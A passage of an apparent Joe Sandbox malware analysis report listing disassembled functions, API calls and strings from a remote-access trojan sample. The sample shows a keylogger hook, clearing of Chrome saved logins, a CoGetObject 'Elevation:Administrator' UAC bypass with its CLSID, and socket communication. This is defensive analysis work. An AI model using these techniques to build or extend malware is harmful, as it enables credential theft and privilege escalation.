                                                                                                                                                                                              • Opcode ID: 485c3068d46bbc27ad7f154d56eccfa046da84bd8fffb3f19a1bbf4f86c2e43c
                                                                                                                                                                                              • Instruction ID: b3d75429b008435a5e1dd269aa2dc422b6d7dab2ccd5499d38c457950c038251
                                                                                                                                                                                              • Opcode Fuzzy Hash: 485c3068d46bbc27ad7f154d56eccfa046da84bd8fffb3f19a1bbf4f86c2e43c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C318F72544308AFE700DF90EC45FDBBBECEB48715F00083ABA45961A1D7B5E948DBA6
                                                                                                                                                                                              Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00406788
                                                                                                                                                                                              • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Object_wcslen
                                                                                                                                                                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                                                              • API String ID: 240030777-3166923314
                                                                                                                                                                                              • Opcode ID: 1499520d982b2c6fe98523ebb7f19fcc58a9361d149757f2a1a63c157573ad6f
                                                                                                                                                                                              • Instruction ID: 8131e8b3f96e11b5c9c7103c6ecb9350ac77814929071503a065d606a7b617cc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1499520d982b2c6fe98523ebb7f19fcc58a9361d149757f2a1a63c157573ad6f
                                                                                                                                                                                              • Instruction Fuzzy Hash: A11170B2901118AEDB10FAA58849A9EB7BCDB48714F55007BE905F3281E77C9A148A7D
                                                                                                                                                                                              Function 004198D2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
                                                                                                                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00419945
                                                                                                                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3587775597-0
                                                                                                                                                                                              • Opcode ID: e61e99f355a85b792043c415c774071641b882a3dc166781f1924c38db1b4eec
                                                                                                                                                                                              • Instruction ID: 19b9a1677c56063b65225fc9a0f34bb07ffc83518ef4baa2b379b487d5559ddd
                                                                                                                                                                                              • Opcode Fuzzy Hash: e61e99f355a85b792043c415c774071641b882a3dc166781f1924c38db1b4eec
                                                                                                                                                                                              • Instruction Fuzzy Hash: 84813F711083049BC714FB21DC959AFB7A8BF94718F50493EF582521E2EF78EA05CB9A
                                                                                                                                                                                              Function 0041B43F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B499
                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4CB
                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B539
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B546
                                                                                                                                                                                                • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B51C
                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B571
                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B578
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B580
                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B593
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2341273852-0
                                                                                                                                                                                              • Opcode ID: 9bd09a2d99c30552ee9248d9d3ead224cb3624160a648d3944adbeb409a266ec
                                                                                                                                                                                              • Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bd09a2d99c30552ee9248d9d3ead224cb3624160a648d3944adbeb409a266ec
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69
                                                                                                                                                                                              Function 004099E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65windowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                                                                                                              • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                                                              • String ID: Keylogger initialization failure: error
                                                                                                                                                                                              • API String ID: 3219506041-952744263
                                                                                                                                                                                              • Opcode ID: 5af43bf104337a9e081dc86c94caad902621d20e35d05cd08c7acc153c36ae5a
                                                                                                                                                                                              • Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5af43bf104337a9e081dc86c94caad902621d20e35d05cd08c7acc153c36ae5a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA
                                                                                                                                                                                              Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                                                              • API String ID: 2127411465-314212984
                                                                                                                                                                                              • Opcode ID: 01ca47e6259c52365a860d80c50150ca5f809e30565b780a3dfea60843a9f005
                                                                                                                                                                                              • Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 01ca47e6259c52365a860d80c50150ca5f809e30565b780a3dfea60843a9f005
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                                                                                                              Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                                                                                                                • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                                                                                                                                                                • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                                              • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                                                                                                              • API String ID: 2281282204-3981147832
                                                                                                                                                                                              • Opcode ID: 15389f4d20d818ee95bf8d757abcbf9e71d2a033ca16b4e774801a1882311dd6
                                                                                                                                                                                              • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 15389f4d20d818ee95bf8d757abcbf9e71d2a033ca16b4e774801a1882311dd6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF
                                                                                                                                                                                              Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040B261
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • UserProfile, xrefs: 0040B227
                                                                                                                                                                                              • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                                                                                                              • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                                                                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                                              • API String ID: 2018770650-1062637481
                                                                                                                                                                                              • Opcode ID: d28def7c9280aa2a9c215b56ee10fe1cde150d05b3267e349477c4c7a3166050
                                                                                                                                                                                              • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
                                                                                                                                                                                              • Opcode Fuzzy Hash: d28def7c9280aa2a9c215b56ee10fe1cde150d05b3267e349477c4c7a3166050
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                                                                                                                                                                                              Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                                                              • API String ID: 3534403312-3733053543
                                                                                                                                                                                              • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                                                              • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                                                                                                              • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                                                              • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                                                                                                              Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                                                                                                • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                                                                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                                                                                                                                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                                                                                                                • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B90,?,?,00000000,00475B90,004017F3), ref: 004047FD
                                                                                                                                                                                                • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404808
                                                                                                                                                                                                • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404811
                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4043647387-0
                                                                                                                                                                                              • Opcode ID: a7e51efc752b031afc58cf73032587facd122f1466f4da27dadf7484b984f89b
                                                                                                                                                                                              • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                                                                                                                                                                                              • Opcode Fuzzy Hash: a7e51efc752b031afc58cf73032587facd122f1466f4da27dadf7484b984f89b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                                                                                                                                                                                              Function 00419BD4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                                                                                                                                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 276877138-0
                                                                                                                                                                                              • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                                                                                                                              • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                                                                                                                                                                                              Function 00418C79 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$Find$CreateFirstNext
                                                                                                                                                                                              • String ID: @CG$XCG$>G
                                                                                                                                                                                              • API String ID: 341183262-3030817687
                                                                                                                                                                                              • Opcode ID: 31d89068bf95987aa1d708424f7af8f01dfdc6c5c004a65f310861421951643d
                                                                                                                                                                                              • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                                                                                                                                                                                              • Opcode Fuzzy Hash: 31d89068bf95987aa1d708424f7af8f01dfdc6c5c004a65f310861421951643d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                                                                                              Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                                • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                                • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                                • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                                • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                                                              • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                                                              • API String ID: 1589313981-1420736420
                                                                                                                                                                                              • Opcode ID: 8e4698fe78d44acac16c4ddae03765096e4e2cb4d027e838fe1b9563e95c49cf
                                                                                                                                                                                              • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e4698fe78d44acac16c4ddae03765096e4e2cb4d027e838fe1b9563e95c49cf
                                                                                                                                                                                              • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                                                                                                                                                                                              Function 004511F3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045128C
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512B5
                                                                                                                                                                                              • GetACP.KERNEL32 ref: 004512CA
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                              • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                              • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                                                                                                                                                                                              Function 0041A64F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
                                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                              • String ID: SETTINGS
                                                                                                                                                                                              • API String ID: 3473537107-594951305
                                                                                                                                                                                              • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                                                              • Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
                                                                                                                                                                                              • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                                                              • Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
                                                                                                                                                                                              Function 004513C7 Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
